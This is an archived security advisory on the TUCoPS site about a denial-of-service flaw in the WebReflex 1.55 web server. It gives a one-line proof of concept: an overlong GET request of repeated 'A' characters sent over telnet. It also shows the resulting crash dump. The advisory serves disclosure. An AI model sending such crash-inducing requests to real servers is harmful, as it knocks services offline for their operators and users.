Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: wreflex1.htm

WebReflex 1.55 Denial of Service



Vulnerability

    WebReflex

Affected

    WebReflex 1.55

Description

    'slipy' found following.  WebReflex  is an easy to use  web server
    that's  easy  to  set  up  and  use.   It has many features like a
    limitless  amount  of  concurrent  requests,  Drive  and directory
    lists,  Built  in  server  side  image-maps, Implementation of the
    CGI-WIN  standard,  User  defined  directory  index  files,   User
    defined error files, Built in MIME type mappings plus user defined
    mappings, Built  in server-  push using  sequence files,  Log file
    using the  common log  file format  and all  the rest.   The  best
    feature of this server is the ability to run it from a CD- ROM.

    WebReflex 1.55 is vulnerable to a simple Denial of Service  attack
    which  will  result  in  the  program causing a General Protection
    Fault  and  end  up  quiting  the  program.   WebReflex is for the
    Microsoft  (c)  operating  systems,  all  apear  to be vulnerable.
    Examples:

        echo "GET " `perl -e 'print "A" x 666'` | telnet 192.168.0.20 80

    Will cause the program to quit within seconds and display:

        REFLEX16 caused a general protection fault
        in module KRNL386.EXE at 0001:00008aee.
        Registers:
        EAX=86cf0000 CS=014f EIP=00008aee
        EFLGS=00000282 EBX=830f000a SS=86f7
        ESP=00008d86 EBP=00008da0 ECX=0000000a
        DS=0167 ESI=00009051 FS=0000 EDX=ffff8dae
        ES=86ef EDI=00008c82 GS=0000
        Bytes at CS:EIP:
        07 1f 61 c3 06 2e 8e 06 02 00 26 89 16 f4 12 26
        Stack dump:
        41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141 41414141
        41414141

Solution

    Vendor has been notified, and waiting for reply.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH